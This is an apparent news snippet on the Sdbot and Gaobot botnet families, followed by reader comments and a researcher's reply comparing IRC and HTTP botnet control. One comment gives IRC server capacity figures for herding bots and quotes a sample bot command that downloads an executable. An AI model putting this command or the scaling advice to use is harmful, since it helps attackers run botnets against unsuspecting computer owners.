The Sdbot and Gaobot malware families are responsible for most botnets worldwide. The two strains were responsible for 80 per cent of detections related to bots during the first quarter of 2007, Spanish anti-virus firm Panda Software reports. Other culprits, although on a lesser scale, included Oscarbot, IRCbot or RXbot. The …
Errrr. Luis Corrons needs to do his homework
OK where to start?
1. IRC controlled botnets as seen by the Dutch herders that got busted in style last year can control hundreds of thousands of bots. I doubt a HTTP controlled net has even got close to that, I have certainly not seen any reports of this anyway. In fact I have not even seen a stable prototype that can deal with more than a few thousand at a time.. IRC servers can be installed on windows or *nix machines then linked together, 1 Unreal server with a little modification can hold upwards of 1000 bots on an average windows server, 4-5,000 on a good windows server and 10,000+ on a fast *nix server, consider that when you link 20 or even 40 of these servers together you may then simultaneously control anywhere from 40,000 to 200,000 to.. Well, limitless.
2. Is Luis Corron saying that with IRC controlled you CANNOT see when a command is executed? If not then maybe he needs to re-phrase his comments. IRC is realtime or as real time as you can get - most IRC controlled bots display a message after a command is executed such as "File Executed", "Upload Complete" "Scanning range 126.96.36.199-188.8.131.52" etc..
3. Correct, IRC is useful for controlling isolated computers - for example you may private message a command to a bot or you may in some cases type the bots IRC name and then the command (Sdbot1109 !download http://www.google.com/virus.exe). However you may also issue a command to an entire channel of bots where there could be many thousands - executing commands on mass! This was a completely moronic and pointless comment. Go back to bot school Mr Carron.
There is nothing a HTTP bot can do that an IRC bot cannot.
Why is he even being quoted when he blatantly doesn't have a clue?
If this is the salvation from our bot infested misery then please help us Lord Satan.
IRC vs HTTP
Well, there is a significance to the switch to HTTP, that the author didn't hit on (which is quite surprising, actually).
the Reason that the bot herders are using tcp 80 isn;t nessecarilly about the interface or capacity of the controller server. it may play a part but as a white hat, I can;t back that up with expirence. What i can back up is that it is easy to block IRC on a firewallbox or router.
the problem with http (and the reason the hackers are useing it) is that you don't have the info needed to block tcp 80 to malware, while simultaneously allowing legitimate http traffic. if you have a software firewall that can operate at all layers of the OSI, then you could restrict tcp 80 outbound to just allow specific executables like your browser/mail client, without completely blocking the port, but software firewalls are not common on enterprise end systems. the only way I can think of to block that kind of traffic selectively, is with a black list service, and we all know how annoying those can be.
IRC vs HTTP botnets
In the next PandaLabs Quarterly Report I talk about this issue:
"Zombies have usually been associated with personal computers with inadequate protection and broadband Internet connections which are permanently on. In fact, this is still largely the case as the most common infection methods can easily be blocked in corporate environments with good perimeter security policies. These bots usually receive orders via IRC, so, simply having a firewall on the network blocking this type of communications would avoid the bot-herder controlling the zombies.
Hackers however are still drawn by the prospect of controlling millions of corporate computers, due to the quantity or quality of the information they could access. However, they face two obstacles:
1.- Infecting corporate network systems.
Most big companies have security devices to try to keep their networks safe. All will have anti-malware products protecting different network levels. Consequently, the methods used by hackers to attack corporate environments must differ from those used to infect home users. What services do companies have activated? The Internet.
Solution: use web pages as a means of infection, in other words, exploit vulnerabilities so neither users nor administrators are conscious of the infection.
Antivirus protection must also be taken into account. How do they combat them? No manufacturer can guarantee 100% detection. Depending on the technologies it implements (reactive and proactive) it can reach a specific protection level, but it can never offer total protection. Furthermore, most products are only based on reactive technologies (malware detection via signature files), which, although powerful, have a significant disadvantage: they only detect previously identified malware.
Solution: modify malware to prevent signature file detections. Hackers are capable of changing Trojan variants in a few minutes. Unless you possess other types of solutions, such as behavior-based detections, you are vulnerable.
2.- Being able to control the zombies on the network.
Once systems are infected, how can bot-herders communicate with the zombies in a network which has a firewall and other security systems installed? What possible entry points do companies have? The Internet.
Solution: change the way the bot communicates, by using HTTP instead of IRC, to guarantee communication with all zombies without anyone being able to prevent it.
IRC-based bots are still the most common – the source code of some IRC bot families has been circulating on the Internet for many years-, but this trend is quickly shifting towards HTTP-based bots since communication is much more effective in all environments."
I have seen many large (hundreds of thousands zombies) http controlled botnets in the last months, though there are much more IRC botnets right now.